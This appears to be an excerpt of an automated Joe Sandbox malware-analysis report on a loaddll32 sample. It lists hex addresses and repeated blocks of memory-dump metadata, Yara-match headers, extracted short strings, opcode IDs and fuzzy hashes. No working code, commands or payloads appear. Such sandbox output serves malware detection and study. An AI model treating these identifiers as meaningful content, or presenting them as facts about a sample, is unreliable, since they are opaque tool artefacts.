                                                                                                                                                                                      0x003edb7c
                                                                                                                                                                                      0x003edb89
                                                                                                                                                                                      0x003edb8d
                                                                                                                                                                                      0x003edb95
                                                                                                                                                                                      0x003edb9d
                                                                                                                                                                                      0x003edba8
                                                                                                                                                                                      0x003edbb0
                                                                                                                                                                                      0x003edbbb
                                                                                                                                                                                      0x003edbc6
                                                                                                                                                                                      0x003edbd1
                                                                                                                                                                                      0x003edbdc
                                                                                                                                                                                      0x003edbe7
                                                                                                                                                                                      0x003edbef
                                                                                                                                                                                      0x003edbf7
                                                                                                                                                                                      0x003edbfc
                                                                                                                                                                                      0x003edc04
                                                                                                                                                                                      0x003edc0f
                                                                                                                                                                                      0x003edc1a
                                                                                                                                                                                      0x003edc25
                                                                                                                                                                                      0x003edc2d
                                                                                                                                                                                      0x003edc35
                                                                                                                                                                                      0x003edc42
                                                                                                                                                                                      0x003edc46
                                                                                                                                                                                      0x003edc4e
                                                                                                                                                                                      0x003edc59
                                                                                                                                                                                      0x003edc64
                                                                                                                                                                                      0x003edc6f
                                                                                                                                                                                      0x003edc77
                                                                                                                                                                                      0x003edc7c
                                                                                                                                                                                      0x003edc81
                                                                                                                                                                                      0x003edc8b
                                                                                                                                                                                      0x003edc93
                                                                                                                                                                                      0x003edc9b
                                                                                                                                                                                      0x003edca3
                                                                                                                                                                                      0x003edca8
                                                                                                                                                                                      0x003edcb0
                                                                                                                                                                                      0x003edcb8
                                                                                                                                                                                      0x003edcbc
                                                                                                                                                                                      0x003edcc4
                                                                                                                                                                                      0x003edccc
                                                                                                                                                                                      0x003edcd7
                                                                                                                                                                                      0x003edce2
                                                                                                                                                                                      0x003edced
                                                                                                                                                                                      0x003edcf8
                                                                                                                                                                                      0x003edd03
                                                                                                                                                                                      0x003edd0e
                                                                                                                                                                                      0x003edd16
                                                                                                                                                                                      0x003edd1b
                                                                                                                                                                                      0x003edd26
                                                                                                                                                                                      0x003edd2b
                                                                                                                                                                                      0x003edd2f
                                                                                                                                                                                      0x003edd37
                                                                                                                                                                                      0x003edd42
                                                                                                                                                                                      0x003edd4a
                                                                                                                                                                                      0x003edd55
                                                                                                                                                                                      0x003edd63
                                                                                                                                                                                      0x003edd68
                                                                                                                                                                                      0x003edd6c
                                                                                                                                                                                      0x003edd74
                                                                                                                                                                                      0x003edd7c
                                                                                                                                                                                      0x003edd84
                                                                                                                                                                                      0x003edd8f
                                                                                                                                                                                      0x003edd9a
                                                                                                                                                                                      0x003edda5
                                                                                                                                                                                      0x003eddb0
                                                                                                                                                                                      0x003eddc4
                                                                                                                                                                                      0x003eddc9
                                                                                                                                                                                      0x003eddd0
                                                                                                                                                                                      0x003edddb
                                                                                                                                                                                      0x003edde3
                                                                                                                                                                                      0x003eddeb
                                                                                                                                                                                      0x003eddf3
                                                                                                                                                                                      0x003eddf8
                                                                                                                                                                                      0x003ede00
                                                                                                                                                                                      0x003ede10
                                                                                                                                                                                      0x003ede16
                                                                                                                                                                                      0x003ede1b
                                                                                                                                                                                      0x003ede20
                                                                                                                                                                                      0x003ede28
                                                                                                                                                                                      0x003ede3a
                                                                                                                                                                                      0x003ede3d
                                                                                                                                                                                      0x003ede44
                                                                                                                                                                                      0x003ede4f
                                                                                                                                                                                      0x003ede57
                                                                                                                                                                                      0x003ede5f
                                                                                                                                                                                      0x003ede67
                                                                                                                                                                                      0x003ede6f
                                                                                                                                                                                      0x003ede7a
                                                                                                                                                                                      0x003ede85
                                                                                                                                                                                      0x003ede8d
                                                                                                                                                                                      0x003ede98
                                                                                                                                                                                      0x003edea3
                                                                                                                                                                                      0x003edeae
                                                                                                                                                                                      0x003edeb6
                                                                                                                                                                                      0x003edec1
                                                                                                                                                                                      0x003edecc
                                                                                                                                                                                      0x003eded7
                                                                                                                                                                                      0x003edee2
                                                                                                                                                                                      0x003edeed
                                                                                                                                                                                      0x003edef8
                                                                                                                                                                                      0x003edf03
                                                                                                                                                                                      0x003edf15
                                                                                                                                                                                      0x003edf1c
                                                                                                                                                                                      0x003edf23
                                                                                                                                                                                      0x003edf36
                                                                                                                                                                                      0x003edf45
                                                                                                                                                                                      0x003edf4c
                                                                                                                                                                                      0x003edf57
                                                                                                                                                                                      0x003edf62
                                                                                                                                                                                      0x003edf6d
                                                                                                                                                                                      0x003edf78
                                                                                                                                                                                      0x003edf78
                                                                                                                                                                                      0x003edf7d
                                                                                                                                                                                      0x003edf7d
                                                                                                                                                                                      0x003edf7d
                                                                                                                                                                                      0x003edf7d
                                                                                                                                                                                      0x003edf83
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003edf89
                                                                                                                                                                                      0x003ee0e9
                                                                                                                                                                                      0x003ee0f4
                                                                                                                                                                                      0x003ee0f5
                                                                                                                                                                                      0x003ee0fa
                                                                                                                                                                                      0x003ee102
                                                                                                                                                                                      0x003ee104
                                                                                                                                                                                      0x003ee1d1
                                                                                                                                                                                      0x003ee1d1
                                                                                                                                                                                      0x003ee10a
                                                                                                                                                                                      0x003ee013
                                                                                                                                                                                      0x003ee013
                                                                                                                                                                                      0x003edf78
                                                                                                                                                                                      0x003edf78
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003edf78
                                                                                                                                                                                      0x003edf78
                                                                                                                                                                                      0x003edf95
                                                                                                                                                                                      0x003ee08a
                                                                                                                                                                                      0x003ee08f
                                                                                                                                                                                      0x003ee0a3
                                                                                                                                                                                      0x003ee0a4
                                                                                                                                                                                      0x003ee0a5
                                                                                                                                                                                      0x003ee0a6
                                                                                                                                                                                      0x003ee0b8
                                                                                                                                                                                      0x003ee0d0
                                                                                                                                                                                      0x003ee0d5
                                                                                                                                                                                      0x003ee0d8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003ee0d8
                                                                                                                                                                                      0x003edfa1
                                                                                                                                                                                      0x003ee38a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003ee392
                                                                                                                                                                                      0x003edfad
                                                                                                                                                                                      0x003ee054
                                                                                                                                                                                      0x003ee061
                                                                                                                                                                                      0x003ee067
                                                                                                                                                                                      0x003ee06e
                                                                                                                                                                                      0x003ee070
                                                                                                                                                                                      0x003ee076
                                                                                                                                                                                      0x003ee07a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003ee07a
                                                                                                                                                                                      0x003edfb9
                                                                                                                                                                                      0x003ee03b
                                                                                                                                                                                      0x003ee040
                                                                                                                                                                                      0x003ee044
                                                                                                                                                                                      0x003ee047
                                                                                                                                                                                      0x003ee04c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003ee04c
                                                                                                                                                                                      0x003edfc1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003edfda
                                                                                                                                                                                      0x003edfdb
                                                                                                                                                                                      0x003edfdd
                                                                                                                                                                                      0x003edfde
                                                                                                                                                                                      0x003edfe1
                                                                                                                                                                                      0x003edfe7
                                                                                                                                                                                      0x003edff0
                                                                                                                                                                                      0x003edff1
                                                                                                                                                                                      0x003ee003
                                                                                                                                                                                      0x003ee004
                                                                                                                                                                                      0x003ee006
                                                                                                                                                                                      0x003ee00b
                                                                                                                                                                                      0x003ee010
                                                                                                                                                                                      0x003ee010
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003ee010
                                                                                                                                                                                      0x003ee114
                                                                                                                                                                                      0x003ee11a
                                                                                                                                                                                      0x003ee2bb
                                                                                                                                                                                      0x003ee2d1
                                                                                                                                                                                      0x003ee2d2
                                                                                                                                                                                      0x003ee2d4
                                                                                                                                                                                      0x003ee2d5
                                                                                                                                                                                      0x003ee2d6
                                                                                                                                                                                      0x003ee2d8
                                                                                                                                                                                      0x003ee2de
                                                                                                                                                                                      0x003ee2e0
                                                                                                                                                                                      0x003ee2e3
                                                                                                                                                                                      0x003ee2ea
                                                                                                                                                                                      0x003ee2ec
                                                                                                                                                                                      0x003ee2ee
                                                                                                                                                                                      0x003ee2f0
                                                                                                                                                                                      0x003ee2f9
                                                                                                                                                                                      0x003ee2f9
                                                                                                                                                                                      0x003ee2fb
                                                                                                                                                                                      0x003ee2fd
                                                                                                                                                                                      0x003ee2ff
                                                                                                                                                                                      0x003ee302
                                                                                                                                                                                      0x003ee302
                                                                                                                                                                                      0x003ee302
                                                                                                                                                                                      0x003ee31b
                                                                                                                                                                                      0x003ee31c
                                                                                                                                                                                      0x003ee31e
                                                                                                                                                                                      0x003ee31f
                                                                                                                                                                                      0x003ee322
                                                                                                                                                                                      0x003ee323
                                                                                                                                                                                      0x003ee328
                                                                                                                                                                                      0x003ee329
                                                                                                                                                                                      0x003ee334
                                                                                                                                                                                      0x003ee33d
                                                                                                                                                                                      0x003ee33e
                                                                                                                                                                                      0x003ee340
                                                                                                                                                                                      0x003ee345
                                                                                                                                                                                      0x003ee349
                                                                                                                                                                                      0x003ee34c
                                                                                                                                                                                      0x003ee351
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003ee351
                                                                                                                                                                                      0x003ee120
                                                                                                                                                                                      0x003ee126
                                                                                                                                                                                      0x003ee2ad
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003ee2ad
                                                                                                                                                                                      0x003ee12c
                                                                                                                                                                                      0x003ee12e
                                                                                                                                                                                      0x003ee23a
                                                                                                                                                                                      0x003ee23f
                                                                                                                                                                                      0x003ee298
                                                                                                                                                                                      0x003ee29b
                                                                                                                                                                                      0x003ee2a0
                                                                                                                                                                                      0x003ee2a3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003ee2a3
                                                                                                                                                                                      0x003ee134
                                                                                                                                                                                      0x003ee13a
                                                                                                                                                                                      0x003ee1eb
                                                                                                                                                                                      0x003ee1ec
                                                                                                                                                                                      0x003ee1ee
                                                                                                                                                                                      0x003ee1ef
                                                                                                                                                                                      0x003ee1f2
                                                                                                                                                                                      0x003ee1f8
                                                                                                                                                                                      0x003ee201
                                                                                                                                                                                      0x003ee202
                                                                                                                                                                                      0x003ee217
                                                                                                                                                                                      0x003ee218
                                                                                                                                                                                      0x003ee21a
                                                                                                                                                                                      0x003ee21f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003ee21f
                                                                                                                                                                                      0x003ee140
                                                                                                                                                                                      0x003ee146
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003ee157
                                                                                                                                                                                      0x003ee18d
                                                                                                                                                                                      0x003ee1aa
                                                                                                                                                                                      0x003ee1af
                                                                                                                                                                                      0x003ee1b9
                                                                                                                                                                                      0x003ee1b9
                                                                                                                                                                                      0x003ee1bb
                                                                                                                                                                                      0x003ee1bd
                                                                                                                                                                                      0x003ee1c0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003ee356
                                                                                                                                                                                      0x003ee356
                                                                                                                                                                                      0x003ee356
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003ee362

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: D.I$EI$W9X$qeV$qu$rlg$w]$e_
                                                                                                                                                                                      • API String ID: 0-1297867753
                                                                                                                                                                                      • Opcode ID: a822a9cc47a52c7b4f22344ea217ece18b12189106446b26e4d64bc74beb629b
                                                                                                                                                                                      • Instruction ID: 4077417d97d168ae9edbc274a060bc54379b3c7519d3a8096b6d68eb0ba32237
                                                                                                                                                                                      • Opcode Fuzzy Hash: a822a9cc47a52c7b4f22344ea217ece18b12189106446b26e4d64bc74beb629b
                                                                                                                                                                                      • Instruction Fuzzy Hash: B56212715083809FD378CF26C48AB9BBBE1BBC5318F108A1DE5D99A260D7B49949CF53
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: )On$,C:$K:aI$OVTV$T>($_$}mZc$]M
                                                                                                                                                                                      • API String ID: 0-4112715058
                                                                                                                                                                                      • Opcode ID: a66943447ef95b7e9a69670006ed3179934d0551678002aeed070e77d0496f51
                                                                                                                                                                                      • Instruction ID: 6066156346dde7070af9c6c3a41b3b51b53fb7adb6483c28dcf6232bc81d274c
                                                                                                                                                                                      • Opcode Fuzzy Hash: a66943447ef95b7e9a69670006ed3179934d0551678002aeed070e77d0496f51
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B12F0725083819FD369CF65C48AA9BFBE1FBC5348F10891DE1DA96260DBB18949CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: E$0C{$34$:=Z$K|$K|$aP-S$g
                                                                                                                                                                                      • API String ID: 0-2882036941
                                                                                                                                                                                      • Opcode ID: df799aa6ecae367e06a3631fac7b1b2dc6d29e73bfaf85ecba794ed615f07ee7
                                                                                                                                                                                      • Instruction ID: 111c1a1c695f9e95f5150f4e0e90d0120a1db9691de40228bf31cba3fab1b41c
                                                                                                                                                                                      • Opcode Fuzzy Hash: df799aa6ecae367e06a3631fac7b1b2dc6d29e73bfaf85ecba794ed615f07ee7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D12127250D3819FD3A9CF65C58AA8BBBE2FBD5708F10890DE1D986260D7B18949CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: ,<$B1i$K_c$g;X$iaa$p+$w/$2
                                                                                                                                                                                      • API String ID: 0-2198714066
                                                                                                                                                                                      • Opcode ID: 5c90e274c596b6dc8f522960468a5285f7564e65cd5f8d62e77ab7ce8ed2b860
                                                                                                                                                                                      • Instruction ID: bb04e827b6e51c96f444fb95b763f6293b0c6c8889ab5e3ac5d7f3cb54faaf9b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c90e274c596b6dc8f522960468a5285f7564e65cd5f8d62e77ab7ce8ed2b860
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4FF143715083809FD368CF26D84AA5BBBF1FBC4758F50891DF29A862A0D7B58949CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: '~$P@F$`8$eg$q6h$rpJ$b:$zk
                                                                                                                                                                                      • API String ID: 0-3468609645
                                                                                                                                                                                      • Opcode ID: 510a1a8f79768609bfe06c051bed9c16805ffc87bbe9543ad68e4408241032c2
                                                                                                                                                                                      • Instruction ID: e95962539be176a5d8d333d3423814db747d774540339398c9377cbd241f00f6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 510a1a8f79768609bfe06c051bed9c16805ffc87bbe9543ad68e4408241032c2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EE132724083809FC769CF61D589A5BFBE5FBC4758F108A1EF29A86260D7B58948CF42
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %Z*$;^<$Yi3$]<$c3$g$jHF6$xB
                                                                                                                                                                                      • API String ID: 0-3236717411
                                                                                                                                                                                      • Opcode ID: fc8f1204e18e58563af806be89acbeacccfd5bb4339fd658339d032324f27d55
                                                                                                                                                                                      • Instruction ID: d8ad2b80a3dd2132f94453cbf29c663a526839015b061f6b50e38d5d2ae87386
                                                                                                                                                                                      • Opcode Fuzzy Hash: fc8f1204e18e58563af806be89acbeacccfd5bb4339fd658339d032324f27d55
                                                                                                                                                                                      • Instruction Fuzzy Hash: 41D10FB25083809FD765CF66D589A1BFBE1FBC4748F10891DF2968A260D7B29909CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: <$.{u$5dBy$9/x$@f$GJL$rwMZ$=}s
                                                                                                                                                                                      • API String ID: 0-3615119605
                                                                                                                                                                                      • Opcode ID: 8f1778a05a8f3d6e90061f52f0e3cdc4a41c9c86e42f7e59a0cf009eb7529651
                                                                                                                                                                                      • Instruction ID: f2948fe0c11c4df3b773aab256b7f461a395fbce9a0ea8c8ec02bff92f42d545
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f1778a05a8f3d6e90061f52f0e3cdc4a41c9c86e42f7e59a0cf009eb7529651
                                                                                                                                                                                      • Instruction Fuzzy Hash: B7C1FF724083819FD769CF21C98A94BFBE1BBC4748F108E1DF2A596260D7B58909CF47
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: > $Q0f[$U~p$vI[$)$^.$y@
                                                                                                                                                                                      • API String ID: 0-3549945254
                                                                                                                                                                                      • Opcode ID: e99c1fb2487f1a21cba81a7a5bd15f2a8fcd60f9c05ad87de20bc7758406dff3
                                                                                                                                                                                      • Instruction ID: 74b3630767ad47a6c1ba65ebc7cc41a349350db08f62e3f2350e9936acf80e26
                                                                                                                                                                                      • Opcode Fuzzy Hash: e99c1fb2487f1a21cba81a7a5bd15f2a8fcd60f9c05ad87de20bc7758406dff3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 100243B1408381DFD765CF22C58AA5BFBE1FB94748F108A1DF29A86261C7B19949CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: -J$9?$NBD$NBD$P^$Sz$Vf.
                                                                                                                                                                                      • API String ID: 0-1644255200
                                                                                                                                                                                      • Opcode ID: 01165267805042fd5d7528b784aa94010a2bb617952dbcf37156da2804bec1ff
                                                                                                                                                                                      • Instruction ID: c22fce2a7a2bcd21d704d7809fad5198bd339983e83f5a6ae8be633d7533fd8a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 01165267805042fd5d7528b784aa94010a2bb617952dbcf37156da2804bec1ff
                                                                                                                                                                                      • Instruction Fuzzy Hash: BAE121B25093819FC3A9CF25D58A64BFBF1FBD4348F508A0DF19986260C7B49949CF46
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: -a($@#$@I$D$G&$aA]<$|p
                                                                                                                                                                                      • API String ID: 0-3359372099
                                                                                                                                                                                      • Opcode ID: 4e5cb62594511d62e9b22fac1bc16093e11a8665445004bd00cd560a95cb1a2f
                                                                                                                                                                                      • Instruction ID: 4409d86ff05b86b43a0f13cc4ac638d4df90bc2ec9422e40bc3bab6b2566a196
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e5cb62594511d62e9b22fac1bc16093e11a8665445004bd00cd560a95cb1a2f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2EC10F725083809FD369CF26C98991BFBE2BBC4758F108A1DF29596260D3B59949CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 4t$H}B$LH$}'$}'$}'$'
                                                                                                                                                                                      • API String ID: 0-3450385318
                                                                                                                                                                                      • Opcode ID: 658b2231e7cffa273f7f4e07496091e585773d471413fb253eaa660479f52e95
                                                                                                                                                                                      • Instruction ID: b193b1f8ec52e76a208f949db11e66a8f51ea928cf049a0a67168bbfec439c66
                                                                                                                                                                                      • Opcode Fuzzy Hash: 658b2231e7cffa273f7f4e07496091e585773d471413fb253eaa660479f52e95
                                                                                                                                                                                      • Instruction Fuzzy Hash: 249112721093809FC359CF65D58A81BFBF2BBC4748F108A0DF599962A0D7B19949CF46
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: BD$-o$7]bM$c/${d$z
                                                                                                                                                                                      • API String ID: 0-1369920251
                                                                                                                                                                                      • Opcode ID: 0978cbd6e6b2e58b4b5b5a330a28090e9600e36508660258ce69f92898b9e1cc
                                                                                                                                                                                      • Instruction ID: 55e219f13c4857f3754a7e4bbdfb0edab57ee07c17e6052361f80f096d8629fb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0978cbd6e6b2e58b4b5b5a330a28090e9600e36508660258ce69f92898b9e1cc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 171222729083809FE369DF25C48AA4BFBE2BBD4744F108A1DF59986260D7B58949CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %r7$6m%$SG#$TY$qt$v'
                                                                                                                                                                                      • API String ID: 0-3237691032
                                                                                                                                                                                      • Opcode ID: 3692bfb47768d4b3343a18283a9a10c7b5652ad7b44442dcbb6adca0a2b79230
                                                                                                                                                                                      • Instruction ID: 2c5e519c6dc5d09f8c46abad9d04354d8dfffd138546e271fd819546d44ece08
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3692bfb47768d4b3343a18283a9a10c7b5652ad7b44442dcbb6adca0a2b79230
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EF100B25083809FD369CF61C94AA5BBBF1BBC1748F10891CF2DA86260D7B58919CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: &hL$&hL$'Q-$2Kz$E_g$bf
                                                                                                                                                                                      • API String ID: 0-3327759155
                                                                                                                                                                                      • Opcode ID: 818fcac5b5801ca78e024e69867041b2eb9182ed99eaae261f8d373ea8ec87c4
                                                                                                                                                                                      • Instruction ID: ba2de6a2989e053a6a24c2e7b0fd4fac1a4a04d096728b8c001c245da81cff9b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 818fcac5b5801ca78e024e69867041b2eb9182ed99eaae261f8d373ea8ec87c4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 52C132725097408FC368DF25D58A41BFBE2BBC4748F108A2EF5959B260D7B68949CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: OE$OY<$Wv$XF$j,r)$DF`
                                                                                                                                                                                      • API String ID: 0-3120813865
                                                                                                                                                                                      • Opcode ID: 4c7ed5bc41fd165ee86d9bde43c73952c499345e8504fd62d1f97739a7b5e0cb
                                                                                                                                                                                      • Instruction ID: 2e262d9b97182d9acd1d9b2d159fdd7b7dd41335b5c8b290ecf3461d39dc59c1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c7ed5bc41fd165ee86d9bde43c73952c499345e8504fd62d1f97739a7b5e0cb
                                                                                                                                                                                      • Instruction Fuzzy Hash: CDC144725083819FD399CF66C98A84BFBF1FBC4748F108A1DF2955A260D7B59909CF82
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
